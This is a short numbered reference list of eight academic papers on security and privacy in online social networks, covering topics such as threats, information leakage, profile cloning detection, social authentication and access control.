1. Michael Fire, Roy Goldschmidt, and Yuval Elovici. Online Social Networks: Threats and Solutions. 2014.
2. Nurul Nuha Abdul Molok and Shanton Chang (University of Melbourne). Information Leakage through Online Social Networking: Opening the Doorway for Advanced Persistent Threats. 2010.
3. Md Sazzadur Rahman, Ting-Kai Huang, Harsha V. Madhyastha, and Michalis Faloutsos. Efficient and Scalable Socware Detection in Online Social Networks.
4. Sakshi Jain, Juan Lang, Neil Zhenqiang Gong, Dawn Song, Sreya Basuroy, and Prateek Mittal. New Directions in Social Authentication.
5. Michelle Madejski, Maritza Johnson, and Steven M. Bellovin. The Failure of Online Social Network Privacy Settings.
6. Georgios Kontaxis, Iasonas Polakis, Sotiris Ioannidis, and Evangelos P. Markatos. Detecting Social Network Profile Cloning. 2011.
7. Huina Mao, Xin Shuai, and Apu Kapadia. Loose Tweets: An Analysis of Privacy Leaks on Twitter.
8. Yuan Cheng, Jaehong Park, and Ravi Sandhu. An Access Control Model for Online Social Networks Using User-to-User Relationships. 2015.